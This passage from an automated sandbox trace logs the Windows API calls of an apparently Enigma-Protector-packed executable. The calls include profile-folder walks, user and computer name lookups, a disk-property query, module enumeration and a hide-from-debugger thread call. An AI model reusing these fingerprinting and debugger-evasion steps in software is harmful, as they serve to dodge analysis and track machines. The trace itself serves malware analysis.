ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.515] GetLastError () returned 0x12 [0077.515] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.515] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.515] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.515] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0077.515] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0xe414c8 [0077.515] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0077.515] GetLastError () returned 0x12 [0077.515] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.516] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0077.516] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0077.516] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0077.516] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0xe414c8 [0077.516] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0077.516] GetLastError () returned 0x12 [0077.517] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.517] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0077.518] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0077.518] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0077.518] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0077.519] SysReAllocStringLen (in: pbstr=0x28fdb8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb8*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0077.519] SysReAllocStringLen (in: pbstr=0x332008c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x332008c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0077.519] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0077.521] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj", cchLength=0x12 | out: lpsz="c:\\users\\keecfmwgj") returned 0x12 [0077.521] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj", len=0x12 | out: pbstr=0x332009c*="c:\\users\\keecfmwgj") returned 1 [0077.521] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.522] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.522] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.522] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.522] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fda8*="c:\\") returned 1 [0077.522] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.522] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe414c8 [0077.523] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.523] GetLastError () returned 0x12 [0077.523] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.523] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.523] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fda8*="c:\\Users\\") returned 1 [0077.523] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.523] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe414c8 [0077.524] FindNextFileW (in: hFindFile=0xe414c8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.524] GetLastError () returned 0x12 [0077.524] FindClose (in: hFindFile=0xe414c8 | out: hFindFile=0xe414c8) returned 1 [0077.524] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.524] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.525] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.525] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj") returned 1 [0077.525] SysReAllocStringLen (in: pbstr=0x28fdac*=0x0, psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fdac*="c:\\Users\\kEecfMwgj") returned 1 [0077.525] SysReAllocStringLen (in: pbstr=0x3320090*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x3320090*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.525] VirtualFree (lpAddress=0x3324000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0077.527] GetLastError () returned 0x0 [0077.527] SetLastError (dwErrCode=0x0) [0077.575] GetLastError () returned 0x0 [0077.575] SetLastError (dwErrCode=0x0) [0077.575] GetLastError () returned 0x0 [0077.575] SetLastError (dwErrCode=0x0) [0077.576] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0077.576] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0077.576] GetCurrentThread () returned 0xfffffffe [0077.576] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0077.576] GetLastError () returned 0x0 [0077.576] SetLastError (dwErrCode=0x0) [0077.576] GetLastError () returned 0x0 [0077.577] SetLastError (dwErrCode=0x0) [0077.577] GetLastError () returned 0x0 [0077.577] SetLastError (dwErrCode=0x0) [0077.634] GetLastError () returned 0x0 [0077.634] SetLastError (dwErrCode=0x0) [0077.634] GetLastError () returned 0x0 [0077.635] SetLastError (dwErrCode=0x0) [0077.635] GetLastError () returned 0x0 [0077.635] SetLastError (dwErrCode=0x0) [0077.635] GetLastError () returned 0x0 [0077.635] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.683] GetLastError () returned 0x0 [0077.683] SetLastError (dwErrCode=0x0) [0077.747] GetLastError () returned 0x0 [0077.748] SetLastError (dwErrCode=0x0) [0077.796] GetLastError () returned 0x0 [0077.796] SetLastError (dwErrCode=0x0) [0077.796] GetLastError () returned 0x0 [0077.797] SetLastError (dwErrCode=0x0) [0077.844] GetLastError () returned 0x0 [0077.845] SetLastError (dwErrCode=0x0) [0077.845] GetLastError () returned 0x0 [0077.845] SetLastError (dwErrCode=0x0) [0077.845] GetLastError () returned 0x0 [0077.845] SetLastError (dwErrCode=0x0) [0077.954] GetLastError () returned 0x0 [0077.955] SetLastError (dwErrCode=0x0) [0077.955] GetLastError () returned 0x0 [0077.955] SetLastError (dwErrCode=0x0) [0077.955] GetLastError () returned 0x0 [0077.957] SetLastError (dwErrCode=0x0) [0078.006] GetLastError () returned 0x0 [0078.006] SetLastError (dwErrCode=0x0) [0078.006] GetLastError () returned 0x0 [0078.006] SetLastError (dwErrCode=0x0) [0078.007] GetLastError () returned 0x0 [0078.007] SetLastError (dwErrCode=0x0) [0078.080] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0078.080] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0078.080] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0078.080] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0078.080] GetLastError () returned 0x0 [0078.081] SetLastError (dwErrCode=0x0) [0078.081] GetLastError () returned 0x0 [0078.081] SetLastError (dwErrCode=0x0) [0078.081] GetLastError () returned 0x0 [0078.081] SetLastError (dwErrCode=0x0) [0078.081] GetUserNameA (in: lpBuffer=0x557338, pcbBuffer=0x557334 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x557334) returned 1 [0078.090] GetLastError () returned 0x0 [0078.090] SetLastError (dwErrCode=0x0) [0078.165] GetLastError () returned 0x0 [0078.165] SetLastError (dwErrCode=0x0) [0078.165] GetLastError () returned 0x0 [0078.165] SetLastError (dwErrCode=0x0) [0078.165] GetLastError () returned 0x0 [0078.165] SetLastError (dwErrCode=0x0) [0078.165] GetLastError () returned 0x0 [0078.165] SetLastError (dwErrCode=0x0) [0078.165] GetLastError () returned 0x0 [0078.165] SetLastError (dwErrCode=0x0) [0078.213] GetComputerNameA (in: lpBuffer=0x55744c, nSize=0x557448 | out: lpBuffer="Q9IATRKPRH", nSize=0x557448) returned 1 [0078.214] GetLastError () returned 0xcb [0078.214] SetLastError (dwErrCode=0xcb) [0078.214] GetLastError () returned 0xcb [0078.214] SetLastError (dwErrCode=0xcb) [0078.214] GetLastError () returned 0xcb [0078.214] SetLastError (dwErrCode=0xcb) [0078.263] GetLastError () returned 0xcb [0078.263] SetLastError (dwErrCode=0xcb) [0078.263] GetLastError () returned 0xcb [0078.263] SetLastError (dwErrCode=0xcb) [0078.263] GetLastError () returned 0xcb [0078.263] SetLastError (dwErrCode=0xcb) [0078.264] GetLastError () returned 0xcb [0078.264] SetLastError (dwErrCode=0xcb) [0078.313] GetLastError () returned 0xcb [0078.314] SetLastError (dwErrCode=0xcb) [0078.314] GetLastError () returned 0xcb [0078.314] SetLastError (dwErrCode=0xcb) [0078.314] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x", cbMultiByte=43, lpWideCharStr=0x28ee68, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x") returned 43 [0078.314] GetLastError () returned 0x0 [0078.314] SetLastError (dwErrCode=0x0) [0078.393] GetLastError () returned 0x0 [0078.393] SetLastError (dwErrCode=0x0) [0078.393] GetLastError () returned 0x0 [0078.393] SetLastError (dwErrCode=0x0) [0078.394] GetLastError () returned 0x0 [0078.394] SetLastError (dwErrCode=0x0) [0078.475] GetLastError () returned 0x0 [0078.476] SetLastError (dwErrCode=0x0) [0078.525] GetLastError () returned 0x0 [0078.525] SetLastError (dwErrCode=0x0) [0078.525] GetLastError () returned 0x0 [0078.525] SetLastError (dwErrCode=0x0) [0078.525] SysReAllocStringLen (in: pbstr=0x32f1c60*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0x32f1c60*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0078.525] GetLastError () returned 0x0 [0078.526] SetLastError (dwErrCode=0x0) [0078.574] GetLastError () returned 0x0 [0078.574] SetLastError (dwErrCode=0x0) [0078.574] GetLastError () returned 0x0 [0078.574] SetLastError (dwErrCode=0x0) [0078.574] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0078.574] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0078.575] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0078.575] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0078.611] GetLastError () returned 0x0 [0078.611] SetLastError (dwErrCode=0x0) [0078.611] GetLastError () returned 0x0 [0078.611] SetLastError (dwErrCode=0x0) [0078.611] GetLastError () returned 0x0 [0078.611] SetLastError (dwErrCode=0x0) [0078.710] GetWindowsDirectoryA (in: lpBuffer=0x28fcfb, uSize=0x105 | out: lpBuffer="C:\\Windows") returned 0xa [0078.757] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0078.758] DeviceIoControl (in: hDevice=0x11c, dwIoControlCode=0x2d1400, lpInBuffer=0x28fe00*, nInBufferSize=0xc, lpOutBuffer=0x33201a8, nOutBufferSize=0x2710, lpBytesReturned=0x28fe10, lpOverlapped=0x0 | out: lpInBuffer=0x28fe00*, lpOutBuffer=0x33201a8*, lpBytesReturned=0x28fe10*=0xa7, lpOverlapped=0x0) returned 1 [0078.758] CloseHandle (hObject=0x11c) returned 1 [0078.808] GetLastError () returned 0x0 [0078.809] SetLastError (dwErrCode=0x0) [0078.809] GetLastError () returned 0x0 [0078.809] SetLastError (dwErrCode=0x0) [0078.809] GetLastError () returned 0x0 [0078.809] SetLastError (dwErrCode=0x0) [0078.809] GetLastError () returned 0x0 [0078.809] SetLastError (dwErrCode=0x0) [0078.922] GetLastError () returned 0x0 [0078.922] SetLastError (dwErrCode=0x0) [0078.922] GetLastError () returned 0x0 [0078.923] SetLastError (dwErrCode=0x0) [0078.971] GetLastError () returned 0x0 [0078.971] SetLastError (dwErrCode=0x0) [0079.019] GetLastError () returned 0x0 [0079.020] SetLastError (dwErrCode=0x0) [0079.020] GetLastError () returned 0x0 [0079.020] SetLastError (dwErrCode=0x0) [0079.020] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0079.021] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.021] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0079.021] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.021] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.022] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0079.022] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.022] GetLastError () returned 0x0 [0079.022] SetLastError (dwErrCode=0x0) [0079.022] GetLastError () returned 0x0 [0079.023] SetLastError (dwErrCode=0x0) [0079.023] GetLastError () returned 0x0 [0079.023] SetLastError (dwErrCode=0x0) [0079.072] GetCurrentProcessId () returned 0xf34 [0079.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0079.072] GetProcAddress (hModule=0x75a80000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ab7327 [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListFirst") returned 0x75b15bc1 [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListNext") returned 0x75b15c6b [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32First") returned 0x75b15d03 [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32Next") returned 0x75b15eee [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x75b160f3 [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Process32First") returned 0x75ab8abb [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Process32Next") returned 0x75ab8812 [0079.073] GetProcAddress (hModule=0x75a80000, lpProcName="Process32FirstW") returned 0x75ab8b83 [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Process32NextW") returned 0x75ab88da [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32First") returned 0x75b16133 [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32Next") returned 0x75b161df [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Module32First") returned 0x75b16279 [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Module32Next") returned 0x75b16362 [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Module32FirstW") returned 0x75ab79c1 [0079.074] GetProcAddress (hModule=0x75a80000, lpProcName="Module32NextW") returned 0x75ab7d5e [0079.074] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xf34) returned 0x120 [0079.080] Module32First (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.080] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.081] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.082] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.082] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.083] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.084] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.084] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.085] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.086] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.086] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.087] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.088] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.089] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.089] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.090] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.091] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.092] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.093] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.094] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.095] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.096] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.097] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.098] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.098] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.099] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0079.100] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 0 [0079.101] CloseHandle (hObject=0x120) returned 1 [0079.102] GetLastError () returned 0x12 [0079.102] SetLastError (dwErrCode=0x12) [0079.102] GetLastError () returned 0x12 [0079.102] SetLastError (dwErrCode=0x12) [0079.102] GetLastError () returned 0x12 [0079.102] SetLastError (dwErrCode=0x12) [0079.230] GetLastError () returned 0x12 [0079.230] SetLastError (dwErrCode=0x12) [0079.231] GetLastError () returned 0x12 [0079.231] SetLastError (dwErrCode=0x12) [0079.231] GetLastError () returned 0x12 [0079.231] SetLastError (dwErrCode=0x12) [0079.231] GetLastError () returned 0x12 [0079.231] SetLastError (dwErrCode=0x12) [0079.231] GetLastError () returned 0x12 [0079.231] SetLastError (dwErrCode=0x12) [0079.231] GetLastError () returned 0x12 [0079.231] SetLastError (dwErrCode=0x12) [0079.296] GetLastError () returned 0x12 [0079.296] SetLastError (dwErrCode=0x12) [0079.296] GetLastError () returned 0x12 [0079.296] SetLastError (dwErrCode=0x12) [0079.296] GetLastError () returned 0x12 [0079.296] SetLastError (dwErrCode=0x12) [0079.345] GetLastError () returned 0x12 [0079.345] SetLastError (dwErrCode=0x12) [0079.345] GetLastError () returned 0x12 [0079.345] SetLastError (dwErrCode=0x12) [0079.345] GetLastError () returned 0x12 [0079.346] SetLastError (dwErrCode=0x12) [0079.346] GetLastError () returned 0x12 [0079.346] SetLastError (dwErrCode=0x12) [0079.346] GetLastError () returned 0x12 [0079.346] SetLastError (dwErrCode=0x12) [0079.403] GetLastError () returned 0x12 [0079.403] SetLastError (dwErrCode=0x12) [0079.403] GetLastError () returned 0x12 [0079.404] SetLastError (dwErrCode=0x12) [0079.404] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0079.405] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.406] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0079.407] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.408] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0079.409] 